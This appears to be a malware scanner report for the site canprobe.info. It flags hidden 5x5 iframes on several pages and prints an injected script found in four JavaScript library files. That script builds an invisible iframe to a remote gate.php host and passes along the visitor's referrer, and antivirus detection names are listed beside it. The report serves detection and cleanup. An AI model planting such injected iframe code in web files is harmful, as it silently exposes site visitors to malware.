Malware Scanner report for canprobe.info

Malicious/Suspicious/Total urls checked: 4/0/15

4 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "canprobe.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/11/11

11 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=canprobe.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://canprobe.info/	200 OK Content-Length: 20321 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/js/jquery-1.3.2.js	200 OK Content-Length: 58890 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<](<(.\|\s)+>)[^>]$\|^#([\w-]+)$/,f=/^.[^:#\[\.,]$/;o.fn=o.prototype={init:function(E,H){E=E\|\|document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]\|\|!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I\|\|[]);F.context=document ... 3107 bytes are skipped ...yle.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer\|\|'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)}/qpi*/ Antivirus reports: AntiVir JS/iFrame.JS Avast JS:Iframe-FH [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Agent.FNY Emsisoft Trojan.JS.Agent.FNY (B) Comodo TrojWare.JS.TrojanDownloader.Iframe.VC McAfee-GW-Edition JS/Redirector DrWeb JS.IFrame.236 Kaspersky Trojan-Downloader.JS.Iframe.cvd Microsoft Trojan:JS/Iframe.AY PCTools Trojan.Malscript TotalDefense JS/IFrame.IS Jiangmin Trojan/Script.Gen McAfee JS/Redirector NANO-Antivirus Trojan.Script.Iframe.twhjj ClamAV JS.Trojan.Iframe-2 F-Secure Trojan.JS.Agent.FNY VIPRE Trojan.JS.Generic (v) AVG HTML/Framer.FL Norman Iframe.OS Sophos Troj/Iframe-JT GData Trojan.JS.Agent.FNY Symantec Trojan.Malscript!JS BitDefender Trojan.JS.Agent.FNY
http://canprobe.info/js/scripts.js	200 OK Content-Length: 14430 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var KEY_CODES = { TAB : 9, ENTER : 13 }; var GB_ANIMATION = true; $(function() { $(".cpg_zebra tr:even").addClass("tableb"); $(".cpg_zebra tr:odd").addClass("tableb tableb_alternate"); }); function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } function writeCookie(name, data, noDays) { var cookieStr = name + "="+ data; if (writeCookie.arguments.length > 2){ cookieStr ... 3379 bytes are skipped ...opka.style.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer\|\|'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)} Antivirus reports: AntiVir JS/iFrame.JS Avast JS:Iframe-FC [Trj] nProtect Trojan.JS.Agent.FNY Emsisoft Trojan.JS.Agent.FNY (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.AY Fortinet JS/IFrame.CCD!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Iframe.twhjj F-Secure Trojan.JS.Agent.FNY F-Prot JS/IFrame.PT.gen AVG HTML/Framer.FL Norman Iframe.OS Sophos Troj/JsDown-AH GData JS:Iframe-FC Symantec Trojan.Malscript!JS Commtouch JS/IFrame.PT.gen ESET-NOD32 JS/Iframe.BX BitDefender Trojan.JS.Agent.FNY
http://canprobe.info/js/jquery.greybox.js	200 OK Content-Length: 3526 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var GB_DONE = false; var GB_HEIGHT = 400; var GB_WIDTH = 600; function GB_show(caption, url, height, width) { GB_HEIGHT = height \|\| 400; GB_WIDTH = width \|\| 600; if(!GB_DONE) { $(document.body) .append("<div id=\"GB_overlay\"></div><div id=\"GB_window\"><div id=\"GB_caption\" class=\"tableh1\"></div>" + "<img src=\""+js_vars.icon_close_path+"\" alt=\"\" title=\""+js_vars.lang_close+"\"/></div>") ... 1986 bytes are skipped ...opka.style.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer\|\|'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)} Antivirus reports: Ikarus Trojan.IframeRef NANO-Antivirus Trojan.Url.Iframe.ufocw AVG HTML/Framer.FL Norman Iframe.OS
http://canprobe.info/js/jquery.elastic.js	200 OK Content-Length: 3448 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.extend({elastic:function(){var mimics=['paddingTop','paddingRight','paddingBottom','paddingLeft','fontSize','lineHeight','fontFamily','width','fontWeight'];return this.each(function(){if(this.type!='textarea'){return false;} var $textarea=$(this),$twin=$('<div />').css({'position':'absolute','display':'none'}),lineHeight=parseInt($textarea.css('lineHeight'),10)\|\|parseInt($textarea.css('fontSize'),'10'),minheight=parseInt($textarea.css('height'),10)\|\|lineHeight*3,maxhe ... 1739 bytes are skipped ...opka.style.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer\|\|'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)} Antivirus reports: AntiVir JS/iFrame.JS Avast JS:Iframe-FC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Agent.FNY Emsisoft Trojan.JS.Agent.FNY (B) Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.AN Fortinet JS/IFrame.CCD!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Iframe.twhjj F-Secure Trojan.JS.Agent.FNY F-Prot JS/IFrame.PT.gen AVG HTML/Framer.FL Norman Iframe.OS Sophos Troj/JsDown-AH GData JS:Iframe-FC Symantec Trojan.Malscript!JS Commtouch JS/IFrame.PT.gen BitDefender Trojan.JS.Agent.FNY
http://canprobe.info/index.php	200 OK Content-Length: 20321 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/login.php?referer=index.php	200 OK Content-Length: 9490 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/login.php	200 OK Content-Length: 9481 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/index.php?cat=0	200 OK Content-Length: 20331 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/login.php?referer=index.php%3Fcat%3D0	200 OK Content-Length: 9500 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/thumbnails.php?album=lastup	200 OK Content-Length: 12529 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/login.php?referer=thumbnails.php%3Falbum%3Dlastup	200 OK Content-Length: 9512 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/thumbnails.php?album=lastcom	200 OK Content-Length: 7553 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/login.php?referer=thumbnails.php%3Falbum%3Dlastcom	200 OK Content-Length: 9513 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
http://canprobe.info/thumbnails.php?album=topn	200 OK Content-Length: 12282 Content-Type: text/html	suspicious
Hidden iFrame found. size: 5x5 src: http://dfdsfsdfasdf.com/gate.php?f=1040930 <iframe src=http://dfdsfsdfasdf.com/gate.php?f=1040930 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: canprobe.info

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 19:01:46 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: cpg15x_data=YToyOntzOjI6IklEIjtzOjMyOiIwMTc1MjRkNDYyMWU2NzcwMjQ1MGU1ZDY0NWZkMDk0ZSI7czoyOiJhbSI7aToxO30%3D; expires=Sat, 24-Jan-2015 19:01:46 GMT; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: canprobe.info
Referer: http://www.google.com/search?q=canprobe.info

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for canprobe.info

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools